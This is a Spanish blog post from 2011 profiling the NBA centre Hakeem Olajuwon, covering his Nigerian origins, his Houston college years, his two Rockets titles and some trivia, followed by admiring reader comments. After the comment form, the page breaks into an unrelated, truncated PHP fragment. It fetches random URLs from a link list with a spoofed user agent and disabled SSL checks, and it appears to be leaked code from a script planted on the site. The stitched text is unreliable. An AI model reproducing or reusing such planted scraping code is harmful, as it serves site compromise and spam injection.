Hakeem ‘The Dream’ Olajuwon, el hombre que vino de África

15 de February de 2011 por Sergio
Artículo 5 de 5 de la serie Grandes pívots de la historia

Seguimos la línea iniciada en los artículos anteriores sobre los grandes pívots de la historia con el, posiblemente, pívot más completo de la historia reciente. Alguien que puede jactarse de ser el único jugador presente en los top-10 históricos de puntos, rebotes, tapones y robos, merece un lugar muy especial en la historia del deporte de la canasta. Verlo jugar en el poste era lo más parecido a ver tocar un piano con los pies. Siempre tocaba la nota adecuada, con la plasticidad y ritmo necesarios en cada momento. Nada que ver con otros “pisadores de uva” que basan su dominio en el físico a pesar de que Olajuwon no carecía de ello precisamente.

Cualquiera puede repasar las finales de 1994 entre los Rockets y los Knicks y tomar notas de cómo dominar a un adversario de la talla de Ewing. O quizás mejor consultar los enfrentamientos con David Robinson (a mi forma de ver, los dos pívots de características más parecidas entre los grandes), para ser consciente de que es muy posible que semejantes contiendas no vuelvan a repetir nunca. Por desgracia, claro…

Hakeem Abdul Olajuwon vino al mundo en la ciudad nigeriana de Lagos durante el año de 1963 en el seno de una familia de ascendencia Yoruba, comunidad predominante en el Oeste africano. Era el tercero de seis hermanos, y tuvo que demostrar su valía a base de trabajo duro para ganarse el reconocimiento de sus padres (poseedores de una empresa de cemento), instalados en la clase media de la desigual sociedad nigeriana.

Comenzó a jugar al baloncesto a los 15 años en el Muslim Teachers College, desde donde dio el salto a EEUU gracias  una competición con los mejores jugadores africanos. En ese All-Nigeria Teachers Sports Festival de Sokoto llamó la atención de los ojeadores de las franquicias y universidades americanas. Curiosamente, Hakeem acudió a aquel evento siendo parte del equipo de balonmano pero algunos alumnos convencieron al entrenador de que probablemente podría ayudar más al equipo de baloncesto por sus espectaculares condiciones físicas. Todo unos visionarios los tipos, sí señor. Las habilidades adquiridas mientras practicó el balonmano y su breve periplo como portero de fútbol le otorgaron una agilidad y coordinación de pies que luego daría sus frutos en el baloncesto.

Dos años más tarde acabaría enrolándose en la Universidad de Houston donde coincidiría con Clyde Drexler y se convertiría rápidamente en un jugador determinante, llevando a sus Cougars a la Final Four durante cada uno de los 3 años que disputaría la NCAA. En el año 1982, los “Phi Slamma Jamma” fueron eliminados en semifinales por los Tar Heels de Worthy y Jordan pero los otros 2 años, los Cougars disputaron la final, las únicas de toda su historia. En 1983 cayeron en el último segundo frente los NC State Wolfpack y en 1984  perdieron contra los Georgetown Hoyas de Patrick Ewing. Más tarde se tomaría cumplida venganza de ese año. Olajuwon ha sido el último jugador perteneciente a un equipo perdedor que se ha llevado el premio al jugador más valioso de la Final Four. Lo consiguió en 1983.

En 1984 los Rockets obtuvieron el derecho a elegir en primera posición del draft a los Portland TrailBlazers gracias al lanzamiento de una moneda (hasta 1985 no apareció la lotería del draft).  La franquicia de Houston eligió a Olajuwon en primer lugar, resultando Sam Bowie y Michael Jordan las siguientes elecciones para Portland y Chicago respectivamente. Jugadores como Charles Barkley o John Stockton también fueron escogidos aquel año lo que problablemente convierte a ese draft de 1984 en el mejor de la historia.

Hakeem venía a unirse a Ralph Sampson, elección del año anterior del equipo tejano, para formar las “Twin Towers” o Torres Gemelas. Dos pívots que superaban los 2.10 metros y que sobresalían por su gran agilidad frente a jugadores de similares características. Los 20’6 puntos y 11’9 rebotes de Hakeem sirvieron a su equipo para incrementar el balance de victorias en 19 partidos y disputar los playoffs en los que serían eliminados por los Utah Jazz. Ese año terminaría segundo en la clasificación de ROY tras Michael Jordan y sería elegido para el segundo equipo defensivo del año. Sampson y él se convertirían en la primera pareja de jugadores desde la formada por Chamberlain y Baylor en conseguir promedios superiores a los 20 puntos y 10 rebotes por encuentro.

Al año siguiente los Rockets darían gran paso adelante al conseguir disputar las Finales de la NBA tras eliminar a los entonces campeones Los Angeles Lakers en 5 partidos con una actuación destacadísima de Olajuwon, que anotó 40, 35 y 30 puntos en los últimos 3 partidos de la serie, respectivamente. A pesar de ello, no pudieron hacer frente al trío de jugadores altos del equipo verde: los legendarios Parish-McHale-Bird.

A la postre, ese sería el último año de Sampson en el equipo, traspasado a los Warrios por las continuas lesiones que lastraban su mejora y limitaban su ritmo de competición. ¿Qué hizo el jugador nigeriano ante dicha contrariedad? Nada de dejarse llevar como otros que yo me sé: lideró a su equipo en, nada más y nada menos, que 13 apartados estadísticos diferentes…

En los siguientes años se convertiría en un habitual en los equipos ideales del año, defensivos y del All-Star. Como muestra de su completísimo juego, podemos decir que tiene el honor de ser uno de los únicos cuatro jugadores en haber conseguido un cuadruple-doble. Fue en 1990 ante los Bucks, en un encuentro en el que consiguió 18 puntos, 16 rebotes, 11 tapones y 10 asistencias.

Aunque Hakeem Olajuwon era uno de los 5 mejores jugadores de la liga, los Rockets se perdieron la postemporada entre los años 1988 y 1992. En ese espacio de tiempo sufrió una terrible lesión que lo tuvo parcialmente lastrado: en un fortuito golpe se rompió los huesos de la cara que rodean el ojo. Además, al año siguiente sería baja por una arritmia. Estos hechos causaron que al final de la temporada 91-92, muchos pensaran que esa podría ser la última de Olajuwon en la liga, debido, además, a problemas con el equipo a la hora de redactar su próximo contrato. Gracias a dios, el propietario de la franquicia y el jugador limaron asperezas y éste pudo seguir jugando en la competición.

Fue en ese intervalo de tres años posterior a la firma del contrato (92-93 a 94-95) donde se consagró como uno de los más grandes con esto de la pelotita naranja. Seguramente uno de los factores que más contribuyó a la progresión del equipo tejano fue la llegada de Rudy Tomjanovich como entrenador a comienzos de 1992. En la primera temporada completa del entrenador de Michigan, los Rockets establecieron una marca de 55-27, sumando 13 victorias más que el año anterior. Hakeem (ya nacionalizado estadounidense), a su vez, obtuvo la segunda posición en las votaciones al MVP tras Charles Barkley, el premio al Mejor Defensor del año y una posición en el Quinteto Ideal. Fue a partir de aquellos años cuando el pívot perfeccionó sus movimientos de pies inspirándose en la figura de Muhammad Ali. Es justo recordar que los dos títulos que consiguió en su carrera los ganó saliendo airoso en enfrentamientos contra Pat Ewing y un joven Shaquille O’neal durante las Finales. Pocas veces veremos en la historia a un pívot hacer spins y fadeaways como lo hizo “The Dream”. La transformación se hizo evidente esas misma temporada con un incremento de sus estadísticas y una presencia en las Semifinales de Conferencia, donde serían eliminados en el 7º partido, y tras una prórroga, por los Supersonics de Payton y Kemp.

Al año siguiente conseguiría algo que nadie más ha logrado repetir, el MVP de la Temporada y de las Finales, aparte del título de mejor Defensor del Año de la temporada 1994. Su papel durante aquella Regular se hizo aún mas determinante, con unos promedios de 27’3 puntos, 11’9 rebotes, 3’9 asistencias, 1’6 robos y 3’7 tapones por partido, para un porcentaje de victorias del 70’7, la 2ª mejor marca de la liga tras los Sonics. Aquel año los Rockets ganaron sus 15 primeros partidos.

Los Sonics se conviertieron aquel año en el primer equipo capaz de liderar su Conferencia y perder en primera ronda frente el último equipo en entrar en Playoffs al perder frente los Nuggets de Mutombo y LaPhonso Ellis (hace poco los Mavs también consiguieron desbloquear ese “logro”).  En las finales de Conferencia, los Rockets se enfrentaron a los Utah Jazz de Stockton y Malone, a los que ganaron en 5 partidos, clasificándose para disputar el anillo de la NBA a los Knicks de Patrcick Ewing. Esta posiblemente sea una de las finales más apasionantes y recordadas de la historia, yéndose hasta el 7º partido, pero que vivió uno de sus momentos culminantes en el sexto con Olajuwon taponando un lanzamiento de 3 de puntos de John Starks en la ultima posesión con dos puntos de ventaja para su equipo. Por fin, el espigado jugador nigeriano que apareció en la Universidad de Houston enfundado con la ropa ceremonial de su etnia, alcanzaba aquello con lo que tanto había soñado.

Al año siguiente, a pesar del fichaje de su ex-compañero de universidad y All-Star, Clyde Drexler, el equipo de Houston acabó en 6ª posición de su conferencia, a más de 15 victorias de los lideres, los Spurs del MVP David Robinson. Sin embargo, eso no fue ningun impedimento para eliminar consecutivamente a los tres equipos con mejor récord en el Oeste: Jazz, Suns y los propios Spurs. Para rematar la jugada, en las Finales de la NBA se deshicieron de los Magic del ya dominante Shaquille O´Neal en solo 4 partidos, en un tremendo duelo entre los dos pívots (32’8-11’5-5’5 para Hakeem frente a los 28-12’5-6’3 de Shaq). De esa manera, los Rockets se convertían en el 5º equipo en conseguir dos títulos consecutivos y Olajuwon en el 2º jugador por entonces en conseguir dos MVPs de las Finales consecutivos (más tarde lo lograrían el propio O’Neal y Kobe Bryant).

Los Rockets no pudieron repetir sus éxitos anteriores tras la vuelta de Michael Jordan a los Chicago Bulls durante esa ultima temporada, y ya no alcanzarían ninguna otra final. Fueron eliminados en la 95-96 por los Supersonics en solo 4 partidos (semifinales) y por Utah Jazz al año siguiente (luchando por el título de Conferencia), a pesar del fichaje ese año de Charles Barkley.

A partir de año siguiente, y en parte, por culpa de lesiones, su aportacion se vio reducida. Aunque jugó toda la temporada del lock out, fue en las dos siguientes donde vivió su gran declive hasta aportar unos humildes 12 puntos y 7’5 rebotes, para acabar siendo traspasado a Toronto, donde jugaría su última temporada, acabando así con 20 años consecutivos jugando en la misma ciudad.

Más allá de sus logros en la NBA también recordaremos a Olajuwon como uno de los miembros del equipo olímpico estadounidense ganador de la medalla de oro en Atlanta 96.

Simplemente deberíamos colocar a Olajuwon entre los grandes competidores de la epoca dorada del baloncesto, junto a Bird, Jordan, Magic, Thomas  y tantos otros. Un pívot imposible de defender a pesar de no contar con el físico de otros contemporaneos suyos como Malone, Robinson, Shaq, etc… pero que gracias a su ética de trabajo, concentración, perfeccionamiento y mejora constante de recursos en ambos lados de la cancha, se convirtió en el pívot más completo de la historia del baloncesto en la época con mayor competitividad en el puesto de 5. Lo dicho, una leyenda con letras mayúsculas.

Hechos curiosos:

– En el año de su elección en el Draft, los Bulls eligieron a Michael Jordan y… Carl Lewis (en la décima ronda).

– Uno de los pocos jugadores capaces de conseguir un five-by-five, es decir, conseguir 5 o más en 5 categorias estadísticas positivas distintas (puntos, rebotes, asistencias, tapones y robos). Junto a Kirilenko es el único jugador capaz de lograrlo en más de una ocasión y además en alcanzar al menos 6 en cada uno de esos apartados.

– Fue el primer jugador en promocionar zapatillas diferentes a Reebok, Converse, Adidas y Nike. Hizo anuncios de unas Spalding de unos 35€ (frente a los casi 120€ de otros marcas) porque consideraba que tenían un precio más acorde a las familias de clase media-baja estadounidenses.

– Una frase de Shaquille O’neal puede resumir sus habilidades: “Olajuwon tiene 5 movimientos. Cuatro primeros pasos para cada uno de ellos. Eso hacen 20 movimientos”

– Tras su retirada, se convirtió en un gran hombre de negocios. Llegó a ganar más de 100 millones de dólares invirtiendo desde Houston.

– Fundó un programa de entrenamiento para pívots: el Big Man Camp.

– Ha vivido unos años a caballo entre Houston y Jordania donde desarrolló estudios sobre el Corán, libro que leía constantemente incluso antes y después de los partidos. Fue también muy criticado cuando fundó una mezquita en EEUU posteriormente ligada con actividades terroristas. A pesar de celebrar el Ramadán, muchos críticos coincidían en que durante aquellos días su juego era aún mejor.

Comenta

11 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Enormidad de artículo Sergio, felicidades. Y enormidad de jugador también, para mí el mejor pivot que he visto.

      Citar

  2. Tweets that mention Hakeem ‘The Dream’ Olajuwon, el hombre que vino de África | tjnba.com -- Topsy.com dice:
    #2
  3. Leon el africano dice:
    #3

    Olajuwon, clase en estado puro. Su reverso en la linea de fondo y tirito de 3-4 metros era imparable.

      Citar

  4. Vader dice:
    #4

    Grandisimos estos post, de verdad muchas felicidades y seguid así!!!

    Hakeem es junto a Shaq mi pivot preferido. Era increible ver como se movia dentro de la zona y volvia loco a sus defensores, grande!!!

      Citar

  5. zeus dice:
    #5

    Que fortuna de los que tuvimos la oportunidad de verlo en su esplendor.
    PD. Aquella jugada sobre el MVP David Robinson, inolvidable!!!

      Citar

  6. Busky23 dice:
    #6

    Clase,mucha clase dentro y fuera de las canchas la demostrada por este Hall of fame,esos movimientos bailando en la zona son irrepetibles,como decía el gran Montes “El bailarín de claque del Cotton Club”.
    Enhorabuena por esta serie de artículos,siempre es un placer recordar a los mitos que tan buenos ratos nos han hecho pasar.
    Saludos.

      Citar

  7. telekoman dice:
    #7

    Estoy convencido de que a veces hacía pasos en sus bailes de claqué y no se los pitaban por que los árbitros eran incapaces de seguir sus movimientos, y por las dudas, mejor no pitar.

      Citar

  8. Pop dice:
    #8

    La posición de center en la NBA actual es sin duda la más floja desde hace mucho tiempo. ¿Vosotros no tenéis la sensación de que todos estos nombres que salen del artículo, pívots de los 90 como Hakeem, Robinson, Ewing o el joven O’Neal se comerían con patatas a cualquier pívot actual? El mejor center puro de ahora es Howard, y mi sensación es que no le llega a la cintura a estos monstruos.

    ¿O tengo una visión idílica de aquellos años y los tengo mitificados?

      Citar

  9. HisRoyalAirness dice:
    #9

    No, no creo que sea una visión idìlica, yo lo suscribo. Howard está en su mejor momento y no podría con Shaq o Hakeem en el suyo ni en sueños

      Citar

  10. sergio dice:
    #10

    Me alegro de que os guste.

    El duelo O’neal-Olajuwon lo tengo grabado a fuego (y en video) en la retina. Los movimientos de este tipo no eran de pivot… eran mas tipicos de un escolta. Y de los grandes.

      Citar

  11. oasis dice:
    #11

    Enhorabuena Sergio, grandísimo artículo. Un gustazo leerlo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>